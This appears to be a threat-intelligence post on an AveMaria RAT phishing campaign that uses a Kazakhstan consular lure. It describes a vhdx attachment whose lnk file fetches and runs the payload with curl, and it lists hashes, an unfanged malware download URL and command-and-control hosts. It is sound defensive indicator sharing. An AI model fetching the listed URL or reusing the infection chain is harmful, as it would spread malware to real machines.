#AveMariaRAT
The email pretends to be a letter about a meeting between Consul General of Republic of Kazakhstan and Ministry of Foreign Relations of the Astrakhan region.
- The email contains a vhdx attachment.
- The attachment contains a lnk and an archive file (decoy pdf).
- The lnk downloads the AveMaria payload using curl and executes it.
Тезисы.pdf.vhdx
56d1e9d11a8752e1c06e542e78e9c3e4
Download url:
http://45.61.137.32/www.exe
#AveMariaRAT
2300a4eb4bf1216506900e6040820843
C2:
hbfyewtuvfbhsbdjhjwebfy[.]net
193.188.20.163
Operation “Armor Piercer:” Targeted attacks in the Indian subcontinent using commercial RATs - By Asheer Malhotra, Vanja Svajcer and Justin Thattil.
Cisco Talos is tracking a c... http://feedproxy.google.com/~r/feedburner/Talos/~3/q-HOEjOIE_U/operation-armor-piercer.html #avemariarat #warzonerat #malware #netwire #securex #maldoc #apt #rat
#rat #apt #maldoc #securex #netwire #malware #warzonerat #avemariarat